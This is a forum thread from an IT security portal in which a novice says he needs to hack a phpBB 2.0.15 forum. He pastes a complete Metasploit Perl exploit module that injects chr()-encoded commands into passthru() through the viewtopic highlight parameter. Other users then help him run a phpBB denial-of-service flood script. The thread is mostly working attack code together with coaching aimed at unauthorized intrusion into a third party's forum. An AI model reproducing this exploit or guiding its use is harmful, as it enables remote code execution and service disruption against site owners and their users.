 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
How to hack phpbb 2.0.15? |
 |
 Posted: Tue Apr 18, 2006 12:15 am |
 |
|
| Mace1370 |
| Beginner |
 |
|
| Joined: Apr 18, 2006 |
| Posts: 3 |
|
|
|
 |
|
 |
|
Hi guys,
I need to hack a 2.0.15 phpBB forum. I found this crack:
| Code: | ##
# Title: phpBB 2.0.15 arbitrary command execution eXploit
# Name: php_phpbb2_0_15.pm
# License: Artistic/BSD/GPL
# Info: Coded because of boredom.
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::php_phpbb2_0_15;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'phpBB 2.0.15 arbitrary command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke <str0ke [at] milw0rm.com> [Artistic/GPL]' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the viewtopic script', '/phpBB2/viewtopic.php'],
'TOPIC' => [1, 'DATA', 'viewtopic id', '1'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary code execution flaw in phpbb 2.0.15.
}),
'Refs' =>
[
['MIL', '1113'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['phpbb'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $topic = $self->GetVar('TOPIC');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the phpBB get request data
my $data = "?t=$topic&highlight=%27.".
"passthru($byte)".
".%27";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious phpBB Get request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
return;
}
1; |
Is this easy to use? I installed the Metasploit framework, but I am unsure how to go about using this. If anyone could help me out it would be appreciated. If it isn't very easy to use, is there another crack for 2.0.15 and if so how would I use it? |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 18, 2006 12:36 am |
|
|
| sljyro |
| Advanced user |
 |
|
| Joined: Mar 23, 2006 |
| Posts: 53 |
|
|
|
|
|
|
|
| go to page 3, there are a few topics there. |
|
|
|
|
| Posted: Tue Apr 18, 2006 1:21 am |
|
|
| Mace1370 |
| Beginner |
|
|
| Joined: Apr 18, 2006 |
| Posts: 3 |
|
|
|
|
|
|
|
Ok, so I found this one on page three:
http://www.milw0rm.com/id.php?id=1063
I saved it as test.cgi and uploaded it to my server, then CHMODed it 755. When I ran the script all I got was:
| Code: | NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
Host |without http://www.| Path |example. /phpBB2/ or /| Flood Type |1 = Registration, 2 = Search| |
What am I doing wrong? I've tried all the other scripts and they all gave 500 errors, so at least this one runs. However, I'm not sure what to do with it. |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 18, 2006 2:00 am |
|
|
| dinho |
| Regular user |
|
|
| Joined: Apr 15, 2006 |
| Posts: 16 |
|
|
|
|
|
|
|
| Mace1370 wrote: | Ok, so I found this one on page three:
http://www.milw0rm.com/id.php?id=1063
I saved it as test.cgi and uploaded it to my server, then CHMODed it 755. When I ran the script all I got was:
| Code: | NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
Host |without http://www.| Path |example. /phpBB2/ or /| Flood Type |1 = Registration, 2 = Search| |
What am I doing wrong? I've tried all the other scripts and they all gave 500 errors, so at least this one runs. However, I'm not sure what to do with it. |
I don't think you need to save it as .cgi 
its perl so save it as .pl and run it on cmd prompt ... |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 18, 2006 2:04 am |
|
|
| Mace1370 |
| Beginner |
|
|
| Joined: Apr 18, 2006 |
| Posts: 3 |
|
|
|
|
|
|
|
| dinho wrote: | | Mace1370 wrote: | Ok, so I found this one on page three:
http://www.milw0rm.com/id.php?id=1063
I saved it as test.cgi and uploaded it to my server, then CHMODed it 755. When I ran the script all I got was:
| Code: | NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
Host |without http://www.| Path |example. /phpBB2/ or /| Flood Type |1 = Registration, 2 = Search| |
What am I doing wrong? I've tried all the other scripts and they all gave 500 errors, so at least this one runs. However, I'm not sure what to do with it. |
I don't think you need to save it as .cgi
its perl so save it as .pl and run it on cmd prompt ... |
Oh, I'm supposed to run it from my machine? I got the impression I was supposed to upload it to a webhost and run it from there. I think I read a post by someone stating that you had written a tutorial on how to execute PERL files from your machine. I looked around but couldn't find it. Would you mind linking it for me? |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 18, 2006 10:46 am |
|
|
| dinho |
| Regular user |
|
|
| Joined: Apr 15, 2006 |
| Posts: 16 |
|
|
|
|
|
|
|
| Mace1370 wrote: | | dinho wrote: | | Mace1370 wrote: | Ok, so I found this one on page three:
http://www.milw0rm.com/id.php?id=1063
I saved it as test.cgi and uploaded it to my server, then CHMODed it 755. When I ran the script all I got was:
| Code: | NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
Host |without http://www.| Path |example. /phpBB2/ or /| Flood Type |1 = Registration, 2 = Search| |
What am I doing wrong? I've tried all the other scripts and they all gave 500 errors, so at least this one runs. However, I'm not sure what to do with it. |
I don't think you need to save it as .cgi
its perl so save it as .pl and run it on cmd prompt ... |
Oh, I'm supposed to run it from my machine? I got the impression I was supposed to upload it to a webhost and run it from there. I think I read a post by someone stating that you had written a tutorial on how to execute PERL files from your machine. I looked around but couldn't find it. Would you mind linking it for me? |
Take a look at my first topic " [Help] How these codes work !!! " and you will find every thing ... |
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 215
Members: 0
Total: 215
